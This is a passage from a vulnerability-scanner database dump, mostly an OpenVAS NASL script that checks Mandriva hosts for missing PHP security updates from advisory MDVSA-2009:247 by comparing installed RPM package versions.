rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:247.", "modified": "2018-04-06T00:00:00", "published": "2009-09-28T00:00:00", "id": "OPENVAS:136141256231064959", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064959", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:247 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_247.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:247 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities were discovered and corrected in php:\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key with\nthe NULL byte. NOTE: this might only be a vulnerability in limited\ncircumstances in which the attacker can modify or add database entries\nbut does not have permissions to truncate the file (CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact\nand attack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in\nPHP before 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is an unsupported package in contrib named php-gd-bundled that\neventually will get updated to pick up these fixes.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.1, 2009.0, Enterprise Server 5.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:247\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:247.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64959\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-28 19:09:13 +0200 (Mon, 28 Sep 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:247 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.5~14.7mdv2008.1\", 
rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", 
rpm:\"php-xmlwriter~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.5~14.7mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != 
NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", 
rpm:\"php-sysvsem~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.6~18.7mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.6~18.8mdvmes5\", rls:\"MNDK_mes5\")) != NULL) {\n report += res;\n}\nif ((res = 
